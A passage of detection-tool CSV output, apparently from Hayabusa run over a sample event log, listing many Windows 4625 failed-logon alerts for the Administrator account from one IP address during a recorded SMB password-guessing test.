NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: 